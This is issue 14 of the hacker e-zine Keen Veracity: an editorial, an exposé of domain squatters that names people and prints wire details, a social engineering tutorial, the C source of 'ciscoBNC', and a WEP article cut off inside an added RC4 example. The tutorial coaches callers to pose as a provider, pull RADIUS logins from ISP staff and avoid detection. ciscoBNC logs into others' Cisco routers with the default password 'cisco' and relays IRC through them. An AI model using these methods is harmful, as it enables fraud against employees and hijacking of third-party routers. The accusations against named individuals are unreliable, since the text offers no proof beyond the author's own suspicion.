--------------------------------------------------------------------------------

                        K e e n   V e r a c i t y

--------------------------------------------------------------------------------
   I S S U E (14)     L e g i o n s  o f  t h e  U n d e r g r o u n d
----------------------------------------------------[www.legions.org]-----------
--------------------------------------------------------------------------------
M E M B E R S :
  lothos Digital Ebola Firewa11 DataShark Overdose1 Phriction ntwak0 pr00f
  havoc TouchTone archim phemetrix crabby gridmark bantrix
--------------------------------------------------------------------------------
[CONTENTS]------------------------------------------------------------[CONTENTS]
[1]====================================[Editorial - Lothos ]
[2]============================================[Squatters Exposed! - Anonymous ]
[3]========================[The Art of: Social Engineering - danny@away.net.au ]
[4]=======================================[ciscoBNC.c - chrak ]
[5]===================[Wireless Technology Exposed - Vortek ]
[6]==================================[Harriet the Spy - Dreid ]
--------------------------------------------------------------------------------

When I decided to take over the job of editing Keen Veracity, Legions of the
Underground was dead. Maybe not maggot-ridden dead, but on life support kind
of dead. The last issue of Keen Veracity, kv13, was released over a year ago,
and that was just a rehash of old articles with little original content, so it
hardly counts. I can understand the old school articles, because it's
difficult to pull something together when the group doesn't contribute.
The last kv with original content, kv12, was published 7-27-2002, over three
years ago. That issue had over 21 original articles written by group members
and others. This issue, as you can see, has 9, which is sad because Keen
Veracity used to be a quality magazine that was well respected in the security
community.

I have tried to breathe some life into Legions of the Underground. For years
now the members have done nothing constructive, have released no code, no
advisories, nothing. I have tried to get it going again with a new issue of
Keen Veracity, but the only other member to contribute something was
overdose1. (Thanks bro)

The irc channel, #legions on undernet, had degraded as well. People brought
their girlfriends in the channel, there was a lot of drama involved with that
and there was a lot of other infighting and dick-waving. DigiEbola, our
"leader," was one of the biggest dick-wavers when he was supposed to be
holding everything together instead of banning people for no reason other than
he didn't like what they said. A lot of members have confided in me that
they're not happy with digi but are afraid to say anything for fear of being
banned.

I registered the #legions channel with undernet channel services in an effort
to provide some stability for the channel. Everyone who had ops received ops
on X, no one was banned anymore for their opinions, and I figured it was a
good move to make. A few people didn't see it as I did. Digi was upset because
he lost control over the channel. Another member accused me of "taking over"
the channel. I don't see how it could be considered a takeover, since everyone
who had ops before the registration was given ops after the channel
registration. Nothing changed, with the exception that people now got auto
opped when entering the channel. Big deal.

Anyways, I'm the most senior member still in the group.
From the first published members list of Legions of the Underground, from KV3:

  optiklenz cap n crunch tip icer Bronc Buster sreality Zyklon havoc
  HyperLogik Defiant Duncan Silver Slfdstrct lothos

I don't see DigiEbola listed there, and I don't see how my registering the
channel on undernet was considered a "takeover." As the most senior group
member left, there is an argument that I should inherit Legions of the
Underground to counter the "takeover" cry. Our current "leadership" definitely
isn't doing the job.

I have put a lot of time, energy, effort and hard work into this group and I
wasn't content to sit back and let it die. I had considered becoming the new
group leader, weeding out the stagnant members and adding some new blood from
the people I had recently brought to the irc channel. Unfortunately digi
controls the domain name, and while I could always get a new domain, I frankly
don't believe it's worth the effort anymore.

I hereby resign my membership from Legions of the Underground. It's been a
wild ride and I enjoyed every minute of it, but it's time to move on to bigger
and better things. I've made a lot of good friends along the way, and hope
nothing will change that.

I have tried as best as possible to refrain from airing our dirty laundry in
the public, but some things just had to be said. Nothing personal was meant by
any of this, and Digi, please don't take my comments personally. I know we've
butted heads over the future of legions, it wasn't personal, and I still
consider you a friend. I will be transferring ownership of the #legions
undernet channel to you, effective immediately.

Lothos - lothos@lothos.org
http://www.lothos.org

And now, on with the show. I have decided not to include my article in this
issue, it may be released later on my website. Anyways, I hereby present you
with what is likely the last issue of Keen Veracity. Enjoy!

--------------------------------------------------------------------------------
[Squatters Exposed!]=================================================[Anonymous]
--------------------------------------------------------------------------------

Squatters Exposed!
by anonymous

I had my domain name stolen by squatters. Now, before you start complaining
that I should have renewed it if I wanted to keep it, let me explain. When
your domain expires, it goes into a redemption period where it can be renewed.
In my case, the redemption period was cut short and I was unable to renew my
domain. My domain was stolen by a group of squatters who also happen to be
spammers, pornographers, and domain registrars. How this group became domain
registrars is beyond me.

Now, before I get ahead of myself, a little background information and some
detective work:

This is the relevant whois data from my domain:

    Sponsoring Registrar:Intercosmos Media Group Inc. (R48-LROR)
    Registrant ID:ODN-676871
    Registrant Name:Orion Web
    Registrant Organization:Orion Web
    Registrant Street1:1st Floor Muya House
    Registrant Street2:Kenyatta Ave.
    Registrant Street3:p. o. box 4276-30100
    Registrant City:Eldoret
    Registrant State/Province:KE
    Registrant Postal Code:30100
    Registrant Country:KE
    Registrant Phone:+254.0735434737
    Registrant Phone Ext.:
    Registrant FAX:
    Registrant FAX Ext.:
    Registrant Email:info@kenyatech.com

The admin and tech contacts are the same as above.

    Name Server:NS0.DIRECTNIC.COM
    Name Server:NS1.DIRECTNIC.COM

This shows that a company called Orion Web in Kenya, Africa now owns my
domain. Pulling up the web page for my domain shows a page filled with ads,
with a "Click here to buy this domain" button that leads to www.kenyatech.com,
the company that now owns my domain name. They also own lots of other domain
names. Lots and lots, in the range of 140,000 or more.

Kenyatech claims that they're located in Kenya, Africa. They also accept
PayPal. Paypal does not do business with firms located in Kenya.
GeoBytes reports that the ip address for www.kenyatech.com, 209.16.83.2, is
located in Larose, Louisiana. Looking up the same address in the ARIN database
shows this IP is assigned to I-55 Internet Services in Hammond, Louisiana.

A little research on the www.kenyatech.com site, browsing through all the
domains, shows a few patterns. The oldest dated domain I could find registered
to them was in August of 2004. The most current I could find was August 23
2005, a week before this writing. Most are registered to kenyatech, but some
of the older ones are registered to:

    NOLDC, Inc.
    838 Camp Street 4th Floor
    New Orleans, LA 70130
    US
    504-523-0360

Some of the domains are registered to Domain Contender, with the majority
being registered through InterCosmos Media Group, DBA directnic.com. Curious
about where they're from? They're both owned by the same people, and the
address is:

    650 Poydras Street Suite 1150
    New Orleans, LA 70130
    US
    (504) 679-5170

Is it just me, or is there a pattern developing with all these Louisiana
addresses?? The Camp Street address and the Poydras street address are within
blocks of each other.

I filled out a form on www.kenyatech.com offering to buy the domain for $50.
This offer was turned down. They instead suggested that I pay $300 plus a $30
fee, according to the following:

    Hello,

    NOLDC, Inc. accepts wire, money order or certified or cashiers check
    (international checks please add an additional US$50 processing fee)
    only. Checks and money orders must be made payable to NOLDC, Inc., and
    sent to:

    NOLDC, Inc.
    838 Camp St., 4th Floor
    New Orleans, Louisiana 70130

    NOLDC, Inc. Wire Information
    (Note: Please be sure to add wire fees to final price of domain
    purchase. Also, be sure to include the domain name that you are
    purchasing in the Additional Information Section.)
    Wire Fees for US Banks is $10.00
    Wire Fees for Banks outside of the US is $50.00

    Bank: Hibernia Bank
    2412 Manhattan Blvd
    Harvey, La 70058 USA
    ABA#: 065000090
    Account#: 2080083613
    Swift Code: HIBKUS44
    Beneficiary: NOLDC, Inc.
    650 Poydras St Ste 1150
    New Orleans, La 70130 USA

    Sincerely-
    NOLDC, Inc.

This links the Camp Street address with the Poydras Street address, by their
own admission.

Now, who owns Intercosmos a.k.a directnic.com, who owns Domain Contenders, and
who owns NOLDC, Inc? A man by the name of Sigmund Solares. I suspect that
kenyatech.com is also owned by Sigmund Solares, given all the evidence
provided above.

Sigmund Solares has a history of domain squatting, and a history of hiding
behind non-existent entities for the purpose of hiding his squatting. This
WIPO arbitration decision clearly outlines this:

    Complainant claims that Respondent has no rights or legitimate interests
    in the disputed domain name. According to Complainant, this conclusion is
    suggested by Respondent's name: "Legal Services." Additionally, based on
    an investigation conducted by Complainant, Complainant claims that Legal
    Services is a fictitious identity adopted for the sole purpose of
    registering the disputed domain name. According to the investigation
    report there is no business by the name of Legal Services at the address
    listed in the .biz Whois database. Further, there is no business by the
    name of Legal Services at the address provided in the registration
    information. The only business listing found at that address is a
    business called "Ingrid's Beauty Salon." Likewise, the telephone number
    listed in the .biz Whois database is the number for an individual named
    "Sigmund Solares" who claims that he is not affiliated with Respondent.
    In fact, according to Complainant, Sigmund Solares is a principal in and
    primary contact for the Registrar of Respondent's domain name.

    Based on the above, Complainant asserts that Respondent has taken active
    steps to conceal its true identity and provided false contact details in
    connection with its domain name registration. Complainant concludes that
    the use of false and misleading contact information suggests that the
    domain name was registered for improper purposes. Complainant also
    asserts that the fact that its trademark has a strong reputation and is
    widely known is further support of Respondent's bad faith.

    Finally, Complainant notes that the administrative, billing and technical
    contacts for the registration is Joseph Tambert whose e-mail address is
    listed as "josephtambert@homeville.com". Complainant states that the
    website at is a pornographic website. Thus, Complainant claims that a
    risk exists that Complainant's valuable and well-known trademark and
    service mark will be associated with a pornographic site and will be
    tarnished as a result.

    SOURCE:
    http://arbiter.wipo.int/domains/decisions/html/2002/dbiz2002-00190.html

Joseph Tambert may be Sigmund's partner. This is his address:

    Joseph Tambert
    838 Camp Street
    New Orleans

Notice the Camp Street? Sigmund and Joseph are linked together on the whois
info for fbi.biz, as well as the above arbitration case. Joseph's email
address, as explained in the above WIPO arbitration quote, links to a
pornographic website. Sigmund's email, as listed on the whois for
sigmundsolares.com, also points to a porn site.

This group has had IP addresses blocked for sending spam. They have a history
of domain squatting. How the hell did they become domain registrars?

As domain registrars, this gives them access to the whois database. I believe
that they use that access to acquire a list of domains entering the expiration
period. They would then be able to flag that domain as being under their
control, allowing them to transfer ownership to the Kenyatech entity and
cutting short the redemption period.

There is also evidence that suggests they abuse the whois database. The whois
database is used to find information on a domain name, including if it is
available for purchase. They may have access to what names are looked up, and
if it is available, and there is evidence to suggest that they register these
names for themselves before others have a chance to.

They also have a script on every domain they own, to judge the domain's
popularity. This script stores its data on a machine owned by directnic.com.
The more popular sites have to pay more money to buy the domain back. I have
seen less popular sites go for as little as $50, and I've seen some offers of
a thousand dollars turned down. The more popular sites are renewed, and the
less popular are allowed to expire. Being domain registrars, they might not
have had to pay anything to acquire the 144,000+ domains they own.

So, what can you do? If your domain was snatched, by all means don't visit it
or the kenyatech web site. Hopefully it will be allowed to expire. Contact
anyone linking to your website, and have them change the link. If you have a
popular domain, your only hope may be to go through arbitration, or sue. There
is a class action lawsuit being organized by rederon.net. Complain to
ICANN.org, and hopefully we can have their domain registrar status revoked. By
all means, don't pay them and support their bad habits!

[ Editor's note: I also had my domain stolen by kenyatech.com, so when I
  received this I couldn't resist including it. The domain name was for
  RootFest, my computer security convention held in Minneapolis, Minnesota. I
  am selling RootFest t-shirts to raise the funds needed to get my domain
  back. If you're interested in supporting me, or just want to know more about
  my specific case, please visit http://www.rootfest.net.
  -lothos ]

--------------------------------------------------------------------------------
[The Art of: Social Engineering]====================[danny\ ]
--------------------------------------------------------------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%         The Art Of:          %%
%%      Social Engineering      %%
%%                              %%
%%            danny\            %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
http://www.legions.org/kv/kv14.txt
**********************************

%%%%%%%%%%%%%%%%%%%
%% Introduction: %%
%%%%%%%%%%%%%%%%%%%

Social engineering is one of the most effective ways of pulling off some of
the largest security breaches. With a conjunction of being technically savvy,
and being organised and believable, you are a major security threat. In this
paper, I hope to help unleash, and evolve, the social engineering skills
within you, because of course, everyone has at one stage in their life social
engineered.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%       What Is:       %%
%%  Social Engineering  %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Social Engineering is deceiving and manipulating a target. Social engineering
tactics are usually done with the medium of a telephone; It's easier to attack
without being seen, and when carried out correctly, is mostly flawless granted
that you manipulate the operator into believing that you are actually who you
say you are. For most operators, if someone rings up, it's not out of the
ordinary to be requesting information, and their job description consists of
supplying you with this -- It's not hard to get something you want, from
someone that is offering it to you!

%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Doing Your Homework: %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Doing your homework on the target that you will be attempting to gain
information from is a vital part of the social engineering process. You need
to know what you want, how you want it, and you have to get the point across
with a very positive and confident attitude -- Make it believable!
Do not stumble over your words; Everything has to be clear, concise and
professional. When studying about the target, it is essential to only
concentrate on the details that actually matter. Study the terminology used in
the industry, you don't want to sound clueless when asked a question,
background information is imperative.

%%%%%%%%%%%%%%%%%%%%%%%%
%% Being Manipulative %%
%%%%%%%%%%%%%%%%%%%%%%%%

Being manipulative when carrying out a social engineering attack is a
necessity, this is how you will influence the target, controlling them to do
exactly what you want them to without them even realising it. It's a very
skillful, under the radar technique that will help you graciously.

Again, being manipulative means you have to be familiar with the target,
referring back to the "Doing your homework" section, Study the corporate
information of the target, find out how their operation runs, and use it to
your advantage.

Use the operator's name when being greeted; It's usually procedure for them to
introduce themselves to the call -- This shows that you are calm, confident,
and alert. Refer to an employee that works there, this gives the operator the
impression that you are familiar with the company, and takes the call to a
more personal level; This relieves the thought of them thinking otherwise when
requesting the information you desire.

There are two levels you can manipulate on. You can either claim to be a
customer of the target; Used to obtain legitimate customers' account
information, Or claim to be a staff member in another department/employee of a
company that the target deals with.

NOTE: Both can be very effective if the attack is carried out correctly.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%   Finding A Target:    %%
%% Practice Makes Perfect %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Before attempting to carry out a social engineering attack on a high profile
target, practicing on smaller, more vulnerable companies is very valuable;
There's no room for mistakes, especially when the consequences can mean a
pretty heavy jail term.

Attempt to social engineer your local ISP; Most local ISPs resell their
services from a larger mainstream provider. Claim to be an employee of the
company which resells their services to the target; Remember to introduce
yourself in a clear and concise manner, sound confident, and ask for the right
people in the correct department. This opens an array of doors of where you
want to take the attack, whether it be updating their payment details in your
system, or confirming radius server logins for an urgent security maintenance
which needs to be undertaken immediately on their managed server -- Have this
planned, you need to know exactly what you have to say, every step of the
call, do not miss a beat.

Do not sound too eager to gather the information, remember, manipulate them.
Make them believe that it is a security issue on their behalf, and without the
proper fix, their current operation won't be running smoothly; It's all about
them! Advise them on how long it will be before the maintenance is complete.
Once the supposed maintenance has been completed in the timeframe you have
given them, provide them a courtesy callback that the issue has been resolved.
This strikes out the risk of them calling the mainstream provider to see
what's happening with the update, and minimises the risk of being caught.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%   Easy? Not Quite.   %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

It's not always going to be so easy, at times you may find yourself to be in a
heated situation, remain calm, stay in character, offer a callback from one of
your superiors to have the situation sorted out, do whatever means necessary.
Remember, once you start digging your way through the inner workings of a
target, it's only going to get harder. The most vulnerable part of a company
are their employees. Operators may be easy to exploit, but when speaking to
senior representatives, and executives of the company, it's going to be a
whole lot more challenging.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%      Conclusion      %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

So, This concludes my paper. Hopefully this outlines what you need to know on
your journey as a Social Engineer. There are social engineers everywhere, so
the next time you pick up a call, You may have to try twice as hard to
identify who you are actually talking to!

Have Fun!

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%      References      %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Here's some papers and books that will help you. There are a lot of factors to
cover, please visit some of these offsite links for your benefit:

- Paper: Social Engineering
- Link: http://www.sans.org/rr/whitepapers/engineering/1365.php
- Author: Aaron Dolan

- Book: The Art Of Deception: Controlling the Human Element of Security
- Link: http://www.amazon.com/exec/obidos/tg/detail/-/0471237124/102-1921421-8544955?v=glance
- Author: Kevin Mitnick

- Paper: Social Engineering: It's a matter of trust
- Link: http://www.computerworld.com/securitytopics/security/story/0,10801,82894,00.html
- Author: Douglas Schweitzer

--------------------------------------------------------------------------------
[ciscoBNC]==============================================[Chrak ]
--------------------------------------------------------------------------------

[ Editor's note: Chrak was supposed to do a writeup of this for kv, but he's
  been missing in action for a while. I decided to include it as is.
]

/*
 Written 2005 by chrak
 shoutoutz to #b4b0 and #c1zc0 @ EFNet

 ircclient -> ciscoBNC -> router -> ircserver

 /server ciscoBNCserv 7777
 /quote doitup 1.1.1.1 mypass irc.LOL.com 6667

 this is version 0.9, next will have more bug fixes, error checking, password
 protection, ability to disconnect and resume irc sessions, lists of DOITUPs
 stored!

 can someone email me if they know how to turn off IOS> shell echoing?

 This code is distributed under the GNU Public Licence (GPL) version 2.
 See http://www.gnu.org/ for further details of the GPL. If you do not have a
 web browser you can read the LICENSE file in this directory.
**/

/* The header names did not survive in this copy of the listing; these are
   the headers the calls below require. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define D_VER "0.9"
#define D_PORT "7777"
#define D_REALNAME "ciscoBNC user"

int create_server (unsigned int port);
int server_notice (int sock, char *msg);
int server_notice_from (int sock, char *msg, char *from);
int serve_client (int sock);
int relay_client_and_router (int sock, int r_sock);
int rnd1toN (int max);

/* detach from the terminal: the parent exits, the child becomes session leader */
void startdaemon (void)
{
  switch (fork ()) {
  case -1:
    perror ("fork()");
    exit (1);
  case 0:                       /* child */
    break;
  default:                      /* parent */
    exit (0);
  }
  if (setsid () == -1) {
    perror ("setsid()");
    exit (1);
  }
  //fclose(stdin);
  //fclose(stdout);
}

// vhost = NULL for no bind()
int connect_to_tcphost (const char *hostname, unsigned int port,
                        const char *vhost)
{
  int sock;
  struct hostent *he, *hel;
  struct sockaddr_in saddr;
  struct sockaddr_in localaddr;

  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    perror ("socket()");
    return -1;
  }
  if (vhost) {
    if ((hel = gethostbyname (vhost)) == NULL) {
      herror ("gethostbyname()");
      close (sock);
      return -1;
    }
    memset (&localaddr, 0, sizeof (struct sockaddr_in));
    localaddr.sin_family = AF_INET;
    localaddr.sin_port = 0;
    localaddr.sin_addr = *((struct in_addr *) hel->h_addr);
    /* this is to use VHOST */
    if (bind (sock, (struct sockaddr *) &localaddr, sizeof (localaddr))) {
      perror ("bind()");
      close (sock);
      return -1;
    }
  }
  if ((he = gethostbyname (hostname)) == NULL) {
    herror ("gethostbyname()");
    close (sock);
    return -1;
  }
  memset (&saddr, 0, sizeof (saddr));
  saddr.sin_family = AF_INET;
  saddr.sin_port = htons (port);
  saddr.sin_addr = *((struct in_addr *) he->h_addr);
  if (connect (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) {
    perror ("connect()");
    close (sock);
    return -1;
  }
  return sock;
}

/* read one line (up to and including '\n') into line[], always NUL-terminated */
int readline_from_sock (int sock, char *line, int max_read)
{
  int i = 0, retval = 0;

  bzero (line, max_read);
  /* peek at the queued data, leaving room for the terminating NUL */
  retval = recv (sock, line, max_read - 1, MSG_PEEK);
  /* find the end of the first line inside what was actually peeked */
  while (i < retval && line[i] != '\n')
    ++i;
  if (i < retval)
    ++i;                        /* take the newline too */
  retval = read (sock, line, i);
  line[i] = '\0';               /* terminate the string */
  // sloppy but to kill it
  if (strlen (line) == 0) {
    fprintf (stderr, "KILLING THIS CONNECTION\n");
    exit (0);
  }
  return retval;
}

int main (int argc, char *argv[])
{
  int sock, csock;
  socklen_t l;
  struct sockaddr_in caddr;

  fprintf (stderr,
           "ciscoBNC V%s\nrun with additional arg to make daemon (%s -)\n(chrak@b4b0.org) (http://www.chrakworld.com)\non port %s\n",
           D_VER, argv[0], D_PORT);
  if ((sock = create_server (atoi (D_PORT))) == -1) {
    // change to stdout so we can see it from PHP!!@!@
    fprintf (stderr, "create_server FAIL\n");
    exit (-1);
  }
  if (argc > 1)
    startdaemon ();
  // stop zombies
  signal (SIGCHLD, SIG_IGN);
  while (1) {
    l = sizeof (struct sockaddr_in);
    if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) {
      perror ("accept()");
      exit (-1);
    }
    fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr));
    /* one child process per client */
    switch (fork ()) {
    case -1:
      perror ("fork()");
      //write(csock,"fork():ERROR\r\n",strlen("fork():ERROR\r\n"));
      exit (1);
    case 0:                     /* child */
      server_notice (csock, "connected to ciscoBNC!");
      {
        serve_client (csock);
      }
      close (csock);
      exit (0);
    default:                    /* parent */
      close (csock);
    }
  }
}

int create_server (unsigned int port)
{
  int sock, l = 1;
  struct sockaddr_in saddr;

  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    perror ("socket()");
    return -1;
  }
  setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int));
  memset (&saddr, 0, sizeof (saddr));
  saddr.sin_family = AF_INET;
  saddr.sin_port = htons (port);
  saddr.sin_addr.s_addr = INADDR_ANY;
  if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) {
    perror ("bind()");
    return -1;
  }
  /* only 5 connection at a time heh!@ */
  if (listen (sock, 5) == -1) {
    perror ("listen()");
    return -1;
  }
  return sock;
}

int serve_client (int sock)
{
  char buf[1024];
  char doitup[250];
  char mbuf[1024];
  int connected_to_router = 0;
  int connecting_to_irc = 0;
  int sent_pass_once = 0;
  int r_sock;
  char *routername;
  char *routerpass;
  char *ircservname;
  char *ircport;
  char myuser[20], mynick[20];

  srand (time (NULL));          // seed random # generator
  snprintf (myuser, sizeof (myuser), "user%d", rnd1toN (99));
  snprintf (mynick, sizeof (mynick), "d0ud%d", rnd1toN (99));

repeatdoitup:
  routername = NULL;
  routerpass = NULL;
  ircservname = NULL;
  ircport = NULL;
  server_notice (sock, "**************TO CONTINUE*******************");
  server_notice (sock, "HELP ME OUT CLICK ADS AT http://www.chrakworld.com !!");
  server_notice (sock, "/QUOTE DOITUP router routerpass ircserver ircserverport");
  server_notice (sock, "EXAMPLE /quote doitup 1.1.1.1 mypass irc.LOL.com 6667");
  /* wait for the DOITUP line and split it into its four arguments */
  while (1) {
    if (readline_from_sock (sock, buf, sizeof (buf)) == -1) {
      perror ("readline_from_sock()");  //change.
      return -1;
    }
    if (!strncasecmp (buf, "DOITUP", strlen ("DOITUP"))) {
      char *p;
      strncpy (doitup, buf, sizeof (doitup));
      doitup[sizeof (doitup) - 1] = '\0';       /* strncpy may not terminate */
      if ((p = strtok (doitup, " \r\n"))) {
        while ((p = strtok (NULL, " \r\n"))
               && (!routername || !routerpass || !ircservname || !ircport)) {
          if (!routername)
            routername = p;
          else if (!routerpass)
            routerpass = p;
          else if (!ircservname)
            ircservname = p;
          else if (!ircport)
            ircport = p;
        }
        if (!routername || !routerpass || !ircservname || !ircport)
          goto repeatdoitup;    // fuck you
        snprintf (buf, sizeof (buf),
                  "OK.. connecting to router %s with pass %s,ircserver %s: %s\n\nQUOTE something else if nothing happens\n",
                  routername, routerpass, ircservname, ircport);
        server_notice (sock, buf);
        goto doitup_done;       // goto
      } else {
        goto repeatdoitup;      //LOL
      }
    }
  }

doitup_done:
  while (1) {
    if (readline_from_sock (sock, buf, sizeof (buf)) == -1) {
      perror ("readline_from_sock()");  //change.
      return -1;
    }
    if ((r_sock = connect_to_tcphost (routername, 23, NULL)) != -1) {
      connected_to_router = 1;
      snprintf (mbuf, sizeof (mbuf), "connected to %s", routername);
      server_notice (sock, mbuf);
      /* walk the router's telnet dialogue: password prompt, shell prompt, "Open" */
      while (1) {
        if (readline_from_sock (r_sock, buf, sizeof (buf)) == -1) {
          perror ("readline_from_sock()");      //change.
          // do something
        } else {
          // buf[strlen (buf) - 1] = '\0';
          if (strstr (buf, "assword:")) {       // send router passwd
            if (sent_pass_once) {       // failed already. reprompted
              // test this
              server_notice (sock, "ROUTER PASSWORD FAILED!!!");
              return -1;
            }
            sent_pass_once = 1;
            server_notice_from (sock, "Logging into router...", "ciscoBNC");
            write (r_sock, "cisco\r\n", strlen ("cisco\r\n"));
          } else if (buf[strlen (buf) - 1] == '>') {    // got cmd prompt
            if (connecting_to_irc) {    // failed. back at prompt.
              server_notice (sock, "connect irc port FAILED!!");
              return -1;
            }
            server_notice_from (sock, "trying connect irc server", routername);
            // write (r_sock,
            //        "telnet Sterling.VA.US.UnderNet.org 6667\r\n",
            //        strlen
            //        ("telnet Sterling.VA.US.UnderNet.org 6667\r\n"));
            snprintf (buf, sizeof (buf), "connect %s %s\r\n", ircservname,
                      ircport);
            write (r_sock, buf, strlen (buf));
            connecting_to_irc = 1;
          } else if (strstr (buf, "Open")) {    // connection opened!
            snprintf (buf, sizeof (buf), "USER %s %s %s %s\r\n", myuser,
                      routername, ircservname, D_REALNAME);
            write (r_sock, buf, strlen (buf));
            snprintf (buf, sizeof (buf), "NICK %s\r\n", mynick);
            write (r_sock, buf, strlen (buf));
            relay_client_and_router (sock, r_sock);
            return 0;
          }
        }
      }
    } else {
      // fail!
      return -1;
    }
  }
}

int server_notice (int sock, char *msg)
{
  char buf[1024];

  snprintf (buf, sizeof (buf), "NOTICE * :%s\r\n", msg);
  return write (sock, buf, strlen (buf));
}

int server_notice_from (int sock, char *msg, char *from)
{
  char buf[1024];

  snprintf (buf, sizeof (buf), "%s: %s", from, msg);
  return server_notice (sock, buf);
}

// assumes we are connected to irc server from router already.
int relay_client_and_router (int sock, int r_sock)
{
  char buf[1024];
  char buf1[1024] = "";         /* last line sent to the router */
  fd_set rfds;
  int retval;

  while (1) {
    FD_ZERO (&rfds);
    FD_SET (sock, &rfds);
    FD_SET (r_sock, &rfds);
    retval = select (1023, &rfds, NULL, NULL, 0);
    if (retval) {
      if (FD_ISSET (sock, &rfds)) {
        if (readline_from_sock (sock, buf, sizeof (buf)) > 0) {
          write (r_sock, buf, strlen (buf));
          strncpy (buf1, buf, sizeof (buf1));   // save last thing sent.we will need this to stop shell echo from IOS.
        }
        // else..
      }
      if (FD_ISSET (r_sock, &rfds)) {
        if (readline_from_sock (r_sock, buf, sizeof (buf)) > 0) {
          if (strcmp (buf, buf1))
            write (sock, buf, strlen (buf));
          else {
            // printf ("IGNORING IOS ECHO\n");
          }
          // else
        }
      }
    }
  }
}

int rnd1toN (int max)
{
  return (rand () % max) + 1;
}

--------------------------------------------------------------------------------
[Wireless Technology Exposed]========================[Vortek ]
--------------------------------------------------------------------------------

Wireless Technologies Exposed
Security and Specifications demystified
VORTEK

Knowledge is a process of piling up facts; wisdom lies in their simplification
Martin H. Fischer

Greetings, the purpose of this article is to explain a few things about
wireless. I will not go in depth into the security features of the IEEE 802.11
family of specifications. However, I will cover the basics so you will
understand enough to distinguish between the different specifications. You
will know which to apply based on its level of security, and hopefully you
will have enough knowledge to decide for yourself.

NOTE: I will assume you know the RAW basics of some things. If you do not, google.com them. This article is not meant to be a novel. Besides, you will learn a thing or two.

Now grab your favorite beer, wraps or stimulant drink and let's get started! Grab that shit, I'm serious!

The IEEE 802.11 family of specifications is broken down into 4 types. Well, 3 officially. We will begin by breaking down the basics of each type and its features. We will cover its air waves, its basic features of speed, range and such, and its basic security. The first specification we will start with is older than an unpatched chinese server. I didn't cover plain 802.11 because it's ANCIENT!

802.11A

This specification operates on the 5GHz band, which is good because most of your current household phones work on the overcrowded 2.4GHz band. The downfall to this higher frequency range is its inability to penetrate walls and obstructions, which can be quite cumbersome. It also carries a higher cost for its equipment, let alone its crappy range. Expect to get a maximum speed of 54 Mbps.

Now the A specification uses orthogonal frequency division multiplexing (OFDM). OFDM basically splits radio signals into a lot of smaller sub-signals, which in turn are transmitted simultaneously on different frequencies towards the receiver. This reduces some of the crosstalk also. If you'd like more info on OFDM, google it. This is an article, not a novel.

802.11B

This specification operates in the 2.4GHz band. This means overcrowded; don't use it close to microwaves or 2.4GHz cordless phones. Now this frequency penetrates walls a heck of a lot easier. Set your channels right on your wireless router and your signal can go 3 floors down. You also get much more range with B. Now don't expect much speed from this specification, it's only 11 Mbps, but it's more of a stable signal. These products also tend to be cheaper in cost and more widely used.

The 802.11B specification uses direct sequence spread spectrum (DSSS).
Basically there is a chipping code that uses a redundant bit pattern for each bit that is transmitted, which in return aids in resistance to interference. If any of the bits are corrupted the original data will be recovered due to the redundancy of the transmission. Basically THIS MEANS ERROR CORRECTING! Want more info? Google for DSSS.

802.11G

This is nothing more than the best of A and B mixed. It's 2.4GHz at 54Mbps. It is also backwards compatible with B. G also uses OFDM. Now there are some routers that go way beyond 54Mbps with Turbo modes, but why? You're not running some huge fiber-optic network, are you?

802.11 (pre) N

We will cover this after the security section, which I will explain later.

Ok, the security of these is basically all the same: crappy WEP, and WPA1, which is basically nothing more than what was working from 802.11I at the time.

We all know why WEP is insecure. It breaks the #1 cardinal RULE OF RC4: NEVER EVER REPEAT THE KEYS. The problem with WEP is not in RC4 itself, as you can see. The problem is that the idiots who made 802.11 did not specify how IVs ("Initialization Vectors") should be created; also the algorithm is pure crap. WEP uses 24 bits for its IV value range which, as you can see, we could easily use up with high volume traffic. This basically means that the same IV will be used with a different data packet! "BREAKING THE RC4 Cardinal RULE!" What, you ask, if there is no traffic? There are methods to force traffic. >:) If you want to know them, read a WEP cracking tutorial. There are plenty of good ones on google.com.

Now just to clarify a few things, you may wonder what the IV really is. 24-bit values are attached to the secret key and used in the RC4 cipher stream. The reason we have IVs is to ensure that the value used as a seed for the RC4 PRNG ("Pseudo Random Number Generator") is always different.

Ok, what does all this mean?
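
What a repeated IV gives an eavesdropper, as an added example (not part of the original article): WEP keys RC4 with IV || secret, so two frames sent under the same IV share one keystream and their ciphertexts XOR to the XOR of their plaintexts. The secret, IVs, payloads and the 1000 frames/s rate are constructed for the demo; the last two functions estimate how quickly a 24-bit IV space runs out compared with a 48-bit one.

```python
"""WEP keystream reuse, shown on constructed data (added example)."""
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


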